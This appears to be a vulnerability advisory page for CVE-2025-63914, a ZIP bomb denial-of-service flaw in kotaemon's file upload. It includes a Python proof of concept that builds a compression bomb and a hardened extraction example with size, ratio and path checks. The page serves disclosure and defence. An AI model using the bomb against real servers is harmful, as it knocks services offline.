Security Vulnerability Report
CVE-2025-63914 CVSS 6.5 MEDIUM

CVE-2025-63914

Published: 2025-11-24 20:15:50
Last Modified: 2025-12-30 17:33:21

Description

An issue was discovered in Cinnamon kotaemon 0.11.0. The _may_extract_zip function in the \libs\ktem\ktem\index\file\ui.py file does not check the contents of uploaded ZIP files. Although the contents are extracted into a temporary folder that is cleared before each extraction, successfully uploading a ZIP bomb could still cause the server to consume excessive resources during decompression. Moreover, if no further files are uploaded afterward, the extracted data could occupy disk space and potentially render the system unavailable. Anyone with permission to upload files can carry out this attack.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
(network-reachable, low complexity, requires an authenticated low-privilege uploader, no user interaction; impact limited to availability)
Weakness
CWE-409 (Improper Handling of Highly Compressed Data)

Configurations (Affected Products)

cpe:2.3:a:cinnamon:kotaemon:0.11.0:*:*:*:*:*:*:* - VULNERABLE
Cinnamon kotaemon 0.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-63914 PoC - ZIP Bomb DoS Attack for kotaemon

This PoC demonstrates how to create a ZIP bomb that can cause denial of
service when uploaded to kotaemon's file upload feature.
"""
import os
import zipfile


def create_zip_bomb(output_path='malicious.zip', compression_ratio=10000):
    """
    Create a ZIP bomb file for testing purposes.

    Args:
        output_path: Path to save the ZIP bomb
        compression_ratio: Payload size multiplier in KiB
            (e.g., 10000 means a ~10 MB uncompressed payload)

    Note: a single DEFLATE stream cannot exceed a ratio of roughly 1032:1,
    so ~10 MB of identical bytes compresses to about 10 KB, not 1 KB.
    """
    # A run of identical bytes compresses about as well as DEFLATE allows
    bomb_data = b'A' * (1024 * compression_ratio)

    # compresslevel=9 selects the strongest DEFLATE setting
    with zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED,
                         compresslevel=9) as zf:
        zf.writestr('bomb_payload.txt', bomb_data)

    compressed = os.path.getsize(output_path)
    print(f'[+] ZIP bomb created: {output_path}')
    print(f'[+] Original size: {len(bomb_data)} bytes')
    print(f'[+] Compressed size: {compressed} bytes')
    print(f'[+] Compression ratio: {len(bomb_data) // max(compressed, 1)}:1')
    return output_path


def verify_zip_bomb(zip_path):
    """Inspect the archive's central directory. This does NOT extract anything."""
    print('\n[!] Inspecting ZIP bomb metadata...')
    with zipfile.ZipFile(zip_path, 'r') as zf:
        for info in zf.infolist():
            print(f'[+] File: {info.filename}')
            print(f'[+] Compressed size: {info.compress_size} bytes')
            print(f'[+] Uncompressed size: {info.file_size} bytes')
            # In the real attack the server decompresses this member in
            # _may_extract_zip, burning CPU and disk during extraction


if __name__ == '__main__':
    zip_file = create_zip_bomb('CVE-2025-63914_bomb.zip', compression_ratio=10000)
    verify_zip_bomb(zip_file)
    print('\n[!] This PoC is for educational and security testing purposes only.')
```
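The PoC above covers the attacker's side. What follows is an added example, not kotaemon's code and not taken from the WxDou repository, of the checks the description says `_may_extract_zip` lacks: a cap on member count, a cap on declared and on actually produced decompressed bytes, a per-member compression-ratio limit, path confinement, and cleanup of partial output on rejection (so a rejected upload cannot leave disk occupied). The limit values, the function names `check_zip_headers`, `safe_extract` and `classify_payload`, and the test payloads are assumptions constructed for the example. A single DEFLATE member tops out near 1032:1, so the header check alone would catch the PoC's archive; nested or overlapping-entry bombs can declare small sizes or push the ratio far higher, which is why the byte count during extraction is enforced as well.

```python
#!/usr/bin/env python3
"""Hardened ZIP extraction (example code, not kotaemon's own)."""
import os
import shutil
import tempfile
import zipfile

# Assumed policy limits for illustration; tune them for the deployment
MAX_ENTRIES = 1000
MAX_TOTAL_BYTES = 50 * 1024 * 1024
MAX_RATIO = 100
CHUNK = 64 * 1024


class UnsafeZipError(ValueError):
    """Archive violates the extraction policy."""


def check_zip_headers(zf, max_entries=MAX_ENTRIES, max_total=MAX_TOTAL_BYTES,
                      max_ratio=MAX_RATIO):
    """Cheap pre-flight on the central directory; returns the declared total.

    Declared sizes are attacker-controlled, so this only filters obvious
    bombs. safe_extract() re-checks the bytes actually produced.
    """
    infos = zf.infolist()
    if len(infos) > max_entries:
        raise UnsafeZipError(f'{len(infos)} entries > {max_entries}')
    total = 0
    for info in infos:
        parts = info.filename.replace('\\', '/').split('/')
        if info.filename.startswith(('/', '\\')) or '..' in parts:
            raise UnsafeZipError(f'unsafe member path {info.filename!r}')
        if info.compress_size and info.file_size / info.compress_size > max_ratio:
            raise UnsafeZipError(f'{info.filename!r} exceeds {max_ratio}:1')
        total += info.file_size
        if total > max_total:
            raise UnsafeZipError(f'declared size exceeds {max_total} bytes')
    return total


def safe_extract(zip_path, dest_dir, max_entries=MAX_ENTRIES,
                 max_total=MAX_TOTAL_BYTES, max_ratio=MAX_RATIO):
    """Extract zip_path into dest_dir enforcing the limits on real output.

    Returns bytes written. On any violation everything written so far is
    removed, so a rejected archive leaves no data on disk.
    """
    dest_dir = os.path.realpath(dest_dir)
    os.makedirs(dest_dir, exist_ok=True)
    written = 0
    try:
        with zipfile.ZipFile(zip_path) as zf:
            check_zip_headers(zf, max_entries, max_total, max_ratio)
            for info in zf.infolist():
                if info.is_dir():
                    continue
                out_path = os.path.realpath(os.path.join(dest_dir, info.filename))
                if os.path.commonpath([dest_dir, out_path]) != dest_dir:
                    raise UnsafeZipError(f'{info.filename!r} escapes {dest_dir}')
                os.makedirs(os.path.dirname(out_path), exist_ok=True)
                # Stream the member so a header lying about file_size cannot
                # make us write more than max_total before we notice
                with zf.open(info) as src, open(out_path, 'wb') as dst:
                    while chunk := src.read(CHUNK):
                        written += len(chunk)
                        if written > max_total:
                            raise UnsafeZipError('decompressed output exceeds limit')
                        dst.write(chunk)
    except (UnsafeZipError, zipfile.BadZipFile):
        for name in os.listdir(dest_dir):
            path = os.path.join(dest_dir, name)
            if os.path.isdir(path):
                shutil.rmtree(path)
            else:
                os.remove(path)
        raise
    return written


def build_archive(path, members):
    """Constructed test input: write {name: bytes} members at DEFLATE level 9."""
    with zipfile.ZipFile(path, 'w', zipfile.ZIP_DEFLATED, compresslevel=9) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return path


def classify_payload(members, **limits):
    """Build a constructed archive in scratch space and run it through safe_extract.

    Returns ('ok', bytes_written) or ('rejected', reason).
    """
    with tempfile.TemporaryDirectory() as work:
        archive = build_archive(os.path.join(work, 'upload.zip'), members)
        dest = os.path.join(work, 'extracted')
        try:
            return ('ok', safe_extract(archive, dest, **limits))
        except UnsafeZipError as exc:
            return ('rejected', str(exc))


if __name__ == '__main__':
    # 1 MiB of 'A' mirrors the PoC's payload: ratio ~1000:1, rejected at the header
    print('bomb   ->', classify_payload({'payload.txt': b'A' * (1024 * 1024)}))
    print('benign ->', classify_payload({'notes/readme.txt': b'hello kotaemon\n'}))
    print('slip   ->', classify_payload({'../escape.txt': b'x'}))
```

The ratio limit is the most deployment-specific knob: legitimate text and document bundles rarely exceed 20:1 to 50:1, while the PoC's single-member archive sits near DEFLATE's ceiling. The byte cap inside the read loop is what actually bounds resource use; the header checks just let the server refuse cheaply before spending any CPU.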

References

https://github.com/Cinnamon/kotaemon (Product)
https://github.com/WxDou/CVE-2025-63914 (Exploit, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-63914",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-24T20:15:50.320",
    "lastModified": "2025-12-30T17:33:21.343",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An issue was discovered in Cinnamon kotaemon 0.11.0. The _may_extract_zip function in the \\libs\\ktem\\ktem\\index\\file\\ui.py file does not check the contents of uploaded ZIP files. Although the contents are extracted into a temporary folder that is cleared before each extraction, successfully uploading a ZIP bomb could still cause the server to consume excessive resources during decompression. Moreover, if no further files are uploaded afterward, the extracted data could occupy disk space and potentially render the system unavailable. Anyone with permission to upload files can carry out this attack."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-409"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:cinnamon:kotaemon:0.11.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "7202887C-4D01-4D84-A56D-837E79118FD2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Cinnamon/kotaemon",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/WxDou/CVE-2025-63914",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```